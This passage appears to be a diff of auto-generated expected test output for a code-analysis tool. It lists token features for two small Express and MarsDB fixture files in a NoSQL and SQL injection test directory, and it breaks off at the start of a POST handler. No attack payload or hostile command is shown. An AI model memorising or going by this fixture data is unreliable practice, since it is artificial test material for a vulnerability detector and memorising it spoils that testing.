Mar ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | new Mar ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | new Mar ... myDoc") | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:24 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:24 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:24 | MarsDB | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:35 | MarsDB.Collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:35 | MarsDB.Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:19:3:35 | MarsDB.Collection | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:26:3:35 | Collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:26:3:35 | Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:26:3:35 | Collection | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | CalleeFlexibleAccessPath | MarsDB.Collection | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | calleeImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:37:3:43 | "myDoc" | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:5:8 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:5:8 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:5:8 | db | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db = {\\n myDoc\\n} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db = {\\n myDoc\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:7:7:1 | db = {\\n myDoc\\n} | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:12:7:1 | {\\n myDoc\\n} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:12:7:1 | {\\n myDoc\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:5:12:7:1 | {\\n myDoc\\n} | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | assignedToPropName | myDoc | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:6:3:6:7 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:6 | module | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:6 | module | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:14 | module.exports | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:14 | module.exports | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:19 | module.exports = db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:19 | module.exports = db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:1:9:19 | module.exports = db | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:8:9:14 | exports | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:8:9:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:8:9:14 | exports | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:18:9:19 | db | assignedToPropName | exports | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:18:9:19 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:18:9:19 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:9:18:9:19 | db | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:0 | this | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | db | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:1:1:1 | require | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:13 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:13 | express | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express ... press") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express ... press") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:7:1:34 | express ... press") | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:23 | require | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | exceptional return of require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | exceptional return of require("express") | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:17:1:34 | require("express") | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:1:25:1:33 | "express" | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:16 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:16 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:16 | bodyParser | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyPar ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyPar ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyPar ... arser") | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:7:2:41 | bodyParser | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:26 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:26 | require | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | exceptional return of require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | exceptional return of require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | exceptional return of require ... arser") | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:20:2:41 | require ... arser") | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:2:28:2:40 | "body-parser" | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:8 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:8 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:8 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:8 | db | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db = re ... -from') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db = re ... -from') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:7:3:40 | db = re ... -from') | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:18 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:18 | require | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | exceptional return of require ... -from') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | exceptional return of require ... -from') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | exceptional return of require ... -from') | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | require ... -from') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | require ... -from') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:12:3:40 | require ... -from') | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:3:20:3:39 | './marsdb-flow-from' | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:9 | app | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:7:5:21 | app = express() | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:19 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:19 | express | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | exceptional return of express() | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:5:13:5:21 | express() | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:3 | app | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:7 | app.use | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | app.use ... rue })) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | exceptional return of app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | exceptional return of app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:1:7:50 | exceptional return of app.use ... rue })) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:5:7:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:5:7:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:5:7:7 | use | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:18 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:18 | bodyParser | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:29 | bodyPar ... encoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:29 | bodyPar ... encoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:29 | bodyPar ... encoded | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | calleeImports | express | @@ -1237,6 +6704,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | bodyPar ... true }) | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | exceptional return of bodyPar ... true }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | exceptional return of bodyPar ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:9:7:49 | exceptional return of bodyPar ... true }) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:20:7:29 | urlencoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:20:7:29 | urlencoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:20:7:29 | urlencoded | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | calleeImports | body-parser | @@ -1244,6 +6717,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:31:7:48 | { extended: true } | receiverName | bodyParser | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:40 | extended | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:40 | extended | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:40 | extended | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:33:7:46 | extended: true | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | InputAccessPathFromCallee | 0.extended | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | InputArgumentIndex | 0 | @@ -1252,6 +6734,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:7:43:7:46 | true | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:3 | app | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:9:8 | app.post | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | app.pos ... {});\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | app.pos ... {});\\n}) | contextSurroundingFunctionParameters | | +| 